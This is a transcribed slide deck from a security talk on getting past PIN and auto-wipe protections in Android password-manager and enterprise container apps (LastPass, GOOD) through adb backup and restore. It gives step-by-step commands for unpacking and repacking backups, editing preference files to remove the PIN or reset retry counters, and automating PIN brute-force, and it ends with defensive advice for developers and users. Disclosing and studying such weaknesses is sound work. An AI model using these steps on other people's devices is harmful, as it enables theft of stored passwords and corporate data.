@ChrisJohnRiley > whoami

Transcription

1

2 @ChrisJohnRiley > whoami IT Security Analyst / Security Consultant Raiffeisen Informatik GmbH R-IT CERT Team Regular conference speaker DEF CON Bsides Hashdays SecZone blog Abject Failure (See Life for reference) Chris John Riley

3 THE WISEST MAN, IS HE WHO KNOWS, THAT HE KNOWS NOTHING SOCRATES: APOLOGY, 21D Chris John Riley

4

5 Why Scenario How Closer Look Making it easy Review Chris John Riley

6 Chris John Riley

7 WHY? Chris John Riley

8

9 too much information Chris John Riley

10

11

12 Chris John Riley

13 Containers Multiple uses Pa$$w0rd databases Corporate mail containers Secure notes / files... Chris John Riley

14

15 Chris John Riley

16 but Chris John Riley

17 The device is insecure Chris John Riley

18 ...or worse Chris John Riley

19 BYOD * * Bring Your Own Disease Chris John Riley

20

21 Solution? Chris John Riley

22 Move the security closer to the data! Chris John Riley

23 Chris John Riley

24 but Chris John Riley

25 I lost my phone! Chris John Riley

26 314 mobile phones 'stolen in London every day' offenders traced three or four times out of 10 Source: UK Metropolitan Police 01/2013 Chris John Riley

27 state of Device security Chris John Riley

28 Chris John Riley

29

30 KEEP CALM Chris John Riley

31 secure containers will save us Chris John Riley

32 or not Chris John Riley

33 Chris John Riley

34 . Sc nario Chris John Riley

35 Scenario Given physical access to a device What security do secure containers provide temporary access (< 3 minutes) permanent access Chris John Riley

36

37 but Chris John Riley

38 remember Chris John Riley

39 secure containers will SAVE us Chris John Riley

40 Chris John Riley

41 Chris John Riley

42 G ALS Chris John Riley

43 TL;DR Chris John Riley

44 pwn secure containers Chris John Riley

45 NOT MY G AL Chris John Riley

46 bypass PIN 1234 device Chris John Riley

47 r00t the device Chris John Riley

48 do anything resembling Chris John Riley

49 Chris John Riley

50 Chris John Riley

51 Chris John Riley

52 HOW? Chris John Riley

53 keep it simple Chris John Riley

54 Android Debug Bridge Chris John Riley

55 ADB Android Debug Bridge Requires USB Debugging Enabled Doesn't require ROOTed device Root grants further access / makes things trivial Chris John Riley

56 adb functions Chris John Riley

57 ADB Android Debug Bridge Allows application side-loading [un]install applications over adb Doesn t require device to be active Can be PIN locked (for some functions) New security implemented in Chris John Riley

58 ADB Android Debug Bridge adb backup Backup Android device over adb (ICS onwards) -system system data -apk application apk Can backup specific application data individually adb backup com.android.app -f backup.ab Chris John Riley

59 ADB Android Debug Bridge adb restore Restore Android backup over adb Restore specific application data individually with or without application (apk) adb restore backup.ab Chris John Riley

60 ADB Android Debug Bridge adb pull / push Copy data to / from device over adb Limited access for non-root users no access to application config without root Works on locked devices (PIN Protected) adb pull /sdcard/secret.txt secret.txt Chris John Riley

61 ADB Android Debug Bridge adb shell Shell access on device Send keys / taps Limited for non-root users Works on locked devices (PIN Protected) adb shell Chris John Riley

62 Supporting Tools openssl w/ zlib support star tar tool w/ added functionality we need Chris John Riley

63 Chris John Riley

64 Closer look Chris John Riley

65 Chris John Riley

66 lastpass Chris John Riley

67

68 lastpass Personal solution (w/ enterprise option) Uses online sync Can be secured with a PIN Can wipe data after 5 false logons Restricts screenshots Chris John Riley

69 Can store lastpass.com password So users don't need to type it EVERY time Reduces security Makes it usable! Chris John Riley

70 Why store the PW? Chris John Riley

71 Easy to remember Impossible to type! Chris John Riley

72 It's OK though Chris John Riley

73 You can enable a PIN! Chris John Riley

74 PIN Security Limited to 4 digits! auto-wipe data after 5 false logons Chris John Riley

75 PIN == SECURE! Chris John Riley

76

77 AndroidManifest.xml Chris John Riley

78 AndroidManifest.xml <application android:allowbackup= true > Chris John Riley

79 Default: true Chris John Riley

80 adb backup com.lastpass.lpandroid f lp.ab Chris John Riley

81 What good is an.ab file? Chris John Riley

82 Android Backup (.ab) zlib compressed (kinda) skip header (24 bytes) pipe to openssl w/zlib support dd if=dropbox.ab bs=24 skip=1 openssl zlib -d > dropbox.tar Chris John Riley

83

84 LPandroid.xml lastpass.com username laspass.com password (encoded) PIN (encoded) Settings... Chris John Riley

85 <string name="reprompt_tries"> 0 </string> Chris John Riley

86 That looks interesting! Chris John Riley

87 ( ) THEORY Chris John Riley

88 if reprompt_tries < 5: prompt_for_pin() else drop_the_dbass() end Chris John Riley

89 Theory reprompt_tries as iterator increases till it reaches 5 Sounds reasonable edit the XML and restore it Let's set reprompt_tries to then ;) Chris John Riley

90 Proposed Attack Backup app data Edit XML set reprompt_tries to Repackage Restore Chris John Riley

91 Chris John Riley

92 0 - adb backup com.lastpass.lpandroid -f lpass.ab 1 - dd if=lpass.ab bs=24 skip=1 openssl zlib -d > lpass.tar 2 - tar -tf lpass.tar > lpass.list 3 - tar -xvf lpass.tar 4 - edit apps/com.lastpass.lpandroid/sp/lpandroid.xml 5 - star -c -v -f lpass_new.tar -no-dirslash list=lpass.list apps/ 6 - dd if=lpass.ab bs=24 count=1 of=lpass_new.ab 7 - openssl zlib -in lpass_new.tar >> lpass_new.ab 8 - adb restore lpass_new.ab Chris John Riley

93 Not the easiest process... Chris John Riley

94 Chris John Riley

95 counter++ Chris John Riley

96 good news Chris John Riley

97 We get 10,000 tries Chris John Riley

98 bad news Chris John Riley

99 We get 10,000 tries Chris John Riley

100 Let s make it easier Chris John Riley

101 No PIN > PIN Chris John Riley

102 <string name="passwordrepromptonactivate">0</string> <string name="pincodeforreprompt"></string> <string name="requirepin">0</string> Chris John Riley

103 PROFIT! Chris John Riley

104 Easier Attack Backup app data Edit XML remove PIN Repackage Restore WIN! Chris John Riley

105 Chris John Riley

106 for points... Chris John Riley

107 Persistence Chris John Riley

108 Persistence Backup LastPass from device A Edit backup to remove PIN Rebuild backup Restore backup to device B Close & restart to re-sync changes from device A Profit? Chris John Riley

109 ...but I RESET my password! Chris John Riley

110 PROFIT ++ Chris John Riley

111 ... Chris John Riley

112 GOOD for enterprise Chris John Riley

113 GOOD Enterprise solution Contacts intranet Browser Secured with a PIN or password enterprise policy Wipes data/device after 10 false logons Chris John Riley

114 Adv. security features Double encryption SSL Tunnel + Encrypted contents Full MDM solution Password Policies r00t detection emulator detection advanced detection Chris John Riley

115 Lost device (BYOD) Can an attacker prevent secure wipe Can an attacker access cached data Chris John Riley

116 PROBLEM Chris John Riley

117 unlike LastPass Chris John Riley

118 preferences are encrypted Chris John Riley

119 PROBLEM Chris John Riley

120 auto-wipe after 10 false logons Chris John Riley

121 Chris John Riley

122 Disable PIN Chris John Riley

123 auto-wipe counter Chris John Riley

124 brute-force Chris John Riley

125 but Chris John Riley

126 AndroidManifest.xml <application android:allowbackup= true > Chris John Riley

127

128 THEORY Chris John Riley

129 Theory Auto-wipe counter Stored IN app data somewhere Chris John Riley

130 THEORY Chris John Riley

131 adb restore Chris John Riley

132 over write auto-wipe counter Chris John Riley

133 #facepalm Chris John Riley

134 brute-force Chris John Riley

135 Naïve Attack Backup app data until good.unlock? Try 9 PINS Restore app data Chris John Riley

136 PROBLEM Chris John Riley

137 Chris John Riley

138 Naïve Attack timing 4 digit PIN est. 4.5 hours* 6 digit PIN est days* 8 digit PIN est. 5 years* * ppm ~ 50% keyspace Chris John Riley

139 Naïve Attack timing 4 lower alphanum est. 31 days* 6 lower alphanum est. 3 years* 8 lower alphanum est. 110 years* * ppm ~ 50% keyspace Chris John Riley

140 Naïve Attack timing 4 mixed alphanum est. 1 year* 6 mixed alphanum est years* 8 mixed alphanum est years* * ppm ~ 50% keyspace Chris John Riley

141 Chris John Riley

142 CONTAINER Device Chris John Riley

143 CONTAINER Device Chris John Riley

144 CONTAINER Device Chris John Riley

145 #facepalm #facepalm Chris John Riley

146 Chris John Riley

147

148

149 Adv. Attack Automate PIN + restore adb shell input text adb shell input keyevent adb shell input tap Chris John Riley

150 Minimize keyspace Password Rules No sequenced numbers (e.g. 4567) No duplicate numbers (e.g. 1111) Result Reduced keyspace Chris John Riley

151 Chris John Riley

152 PROFIT! Chris John Riley

153 Chris John Riley

154 Making it easy Chris John Riley

155 methodology Common methodology Backup (adb) Extract Examine here be dragons Edit bypass all the things Repack Restore (adb) Chris John Riley

156 remember this process? Chris John Riley

157 0 - adb backup com.lastpass.lpandroid -f lpass.ab 1 - dd if=lpass.ab bs=24 skip=1 openssl zlib -d > lpass.tar 2 - tar -tf lpass.tar > lpass.list 3 - tar -xvf lpass.tar 4 - edit apps/com.lastpass.lpandroid/sp/lpandroid.xml 5 - star -c -v -f lpass_new.tar -no-dirslash list=lpass.list apps/ 6 - dd if=lpass.ab bs=24 count=1 of=lpass_new.ab 7 - openssl zlib -in lpass_new.tar >> lpass_new.ab 8 - adb restore lpass_new.ab Chris John Riley

158 Say that 10 times fast! Chris John Riley

159

160 automation Chris John Riley

161 Chris John Riley

162 Chris John Riley

163 ab_unpacker.py Chris John Riley

164 ab_packer.py Chris John Riley

165 Makes 0wning things Chris John Riley

166 o o 200 / quicker 1000 o / o funner Chris John Riley

167 Chris John Riley

168

169

170 Chris John Riley

171 RE VIEW Chris John Riley

172 secure containers!= SECURE containers Chris John Riley

173 Physical access Chris John Riley

174

175 Chris John Riley

176 IT Chris John Riley

177 Developers Chris John Riley

178 Chris John Riley

179 android.allowbackup Chris John Riley

180 Some devs GET it! Chris John Riley

181 Chris John Riley

182 pref files Chris John Riley

183 Securing Apps Preference files are NOT secret Encrypt preference data ONLY store encrypted passwords No XOR / base64 please Don t TRUST the config HMAC Sign Encrypt Chris John Riley

184 android backup Chris John Riley

185 Securing Apps Disallow Android Backup if you don t absolutely need it! <application android:allowbackup= false > Chris John Riley

186 extra security Chris John Riley

187 Extra Security USB Debugging Disable app when activated Root makes these hack easier still edit/read preference files on device itself ROOT detection is too basic easy to fool Chris John Riley

188 users end Chris John Riley

189 Users Encrypt your device Encrypts ADB backups Need to enter same passcode on backup screen Disable USB Debugging protects against adb pull/push attacks Don t loose your phone ;) Chris John Riley

190 Chris John Riley

191 Chris John Riley

192 Chris John Riley

193 Question time Chris John Riley

194 Chris John Riley

195 Thank you for your attention! Vielen Dank für Ihre Aufmerksamkeit! Raiffeisen Informatik GmbH Lilienbrunngasse 7-9 A-1020 Wien T +43 1/ F +43 1/ E [email protected] Chris John Riley